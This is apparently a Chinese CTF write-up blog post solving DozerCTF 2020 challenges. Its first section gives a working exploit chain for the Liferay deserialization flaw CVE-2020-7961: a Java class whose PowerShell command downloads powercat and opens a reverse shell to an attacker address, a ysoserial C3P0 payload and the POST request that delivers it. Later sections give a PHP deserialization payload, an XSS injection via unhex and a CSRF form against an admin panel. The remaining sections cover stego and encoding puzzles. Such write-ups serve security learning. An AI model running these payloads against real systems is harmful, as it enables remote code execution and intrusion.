DozerCTF

2020-06-15 14:06:00
ctf - wp - DozerCTF

简单的域渗透1

一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了?

Liferay的cve:CVE-2020-7961

public class Exploit {

static {

try {

String[] cmd = {"cmd.exe", "/c", "powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c ip -p port -e cmd"};

java.lang.Runtime.getRuntime().

exec(cmd).waitFor();

} catch ( Exception e ) {

e.printStackTrace();

}

}

}

首先拿Exploit生成的class文件,挂到vps上面,python -m SimpleHTTPServer 18888

用yso生成一个C3P0的payload

java -jar ysoserial-master-30099844c6-1.jar C3P0 "http://ip:port/:Exploit" > payload.out

之后转16进制:

import java.io.*;

public class poc {
    public String encodeHex(InputStream fi) throws IOException {
        int size;
        String hexStr="";
        while ((size=fi.read())!=-1){
            String byteChar = Integer.toHexString(size);
            if(byteChar.length()<2) {
                byteChar = "0" + byteChar;
            }
           hexStr = hexStr + byteChar;
        }
        return hexStr;
    }
    public static void main(String[] args) throws IOException {
    FileInputStream fi  = new FileInputStream(new File("C:\\Users\\DELL\\Desktop\\payload.bin"));
    poc obj = new poc();
    String pocStr = obj.encodeHex(fi);
    System.out.println(pocStr);
    }
}

得到的payload到/api/jsonws/invoke发个post包:

cmd={"/expandocolumn/add-column":{}}&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:16进制字符串;"}

服务器nc监听弹到一个shell,第一个flag在桌面:

Dozerctf{a993e8ce377e05b2cbfa460e43e43757}

白给的反序列化

class home
{
    private $method;
    private $args;
    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
    }

    function __destruct()
    {
        if (in_array($this->method, array("mysys"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

    function mysys($path)
    {
        print_r(base64_encode(exec("cat $path")));
    }
    function waf($str)
    {
        if (strlen($str) > 8) {
            die("No");
        }
        return $str;
    }

    function __wakeup()
    {
        $num = 0;
        foreach ($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
            $num += 1;
            if ($num > 2) {
                die("No");
            }
        }
    }
}

if ($_GET['path']) {
    $path = @$_GET['path'];
    unserialize($path);
} else {
    highlight_file(__FILE__);

}
?>

一个正常的反序列化题,就是call_user_func_array达成执行mysys,让里面去cat flag.php,有private类,url编码一下直接get过去就拿到了。

exp:

 <?php

class home
{
    private $method;
    private $args;
    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
    }

}

$a = new home("mysys",['flag.php']);
echo urlencode(serialize($a));
?>
O%3A4%3A%22home%22%3A2%3A%7Bs%3A12%3A%22%00home%00method%22%3Bs%3A5%3A%22mysys%22%3Bs%3A10%3A%22%00home%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22flag.php%22%3B%7D%7D
PD9waHAgJGZsYWcgPSAnZmxhZ3tqNG5jOTIwZm04YjJ6MHIybWM3ZHNmODdzNjc4NWE2NzVzYTc3NnZkfSc7Pz4=
<?php $flag = 'flag{j4nc920fm8b2z0r2mc7dsf87s6785a675sa776vd}';?>

夏日计划

前面不知道是不是有什么隐写,拿360直接拖出来应该secret压缩包,根据提示修复密码,也就是修复secret压缩包,貌似文件头坏了?直接winrar修复,拿到几个secret文件,看了下0-139,并不是全部数字都有一一对应,结合游戏来说坐标可能性不小。

用gnuplot:

plot "1.txt" lt 0

因为不会用gnuplot,搞得黑色实在有点白,所以反了下画笔和背景。。ps上调调颜色,汉信码。

出题师傅给flag。

Fake phpMiniAdmin

试了下有个admin_shark.php。

建了个表,试了下过滤了script的两个尖角,试了下转16进制插入,用concat和chr插入应该也是可以的,没试

select hex(`<script>alert(1)</script>`);
//3C7363726970743E616C6572742831293C2F7363726970743E

插入的时候:

insert into hhhm123 values(1,unhex('3C7363726970743E616C6572742831293C2F7363726970743E'));

题目跟bbctf的note思路差不多,xss+csrf打管理员

vps上挂个自动提交的表单:

···
<input type="hidden" name="hhh" value="select * from hhhm123" />
···

详细参考:https://www.cnblogs.com/afanti/p/8277344.html

试了下抓源码抓到flag:

Dozerctf{eed8cdc400dfd4ec85dff70a170066b7}

签到

CyberChef上点击魔术棒一键生成flag (:

Dozerctf{base_family_is_so_good}

貌似有些不对

一个自定义的base64

OEG7U19kUvCsV29qzT9qcUm0yDCwy2CiWjOrU2Or

喜闻乐见CyberChef,base64换个表

Dr{__g_!ocomiom}ztlasoaefdn_dn

栅栏密码移位4

Dozerctf{old_man_is_good_man!}

py吗?

高度修复+Stegsolve Data Extract+base64

问卷调查



本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号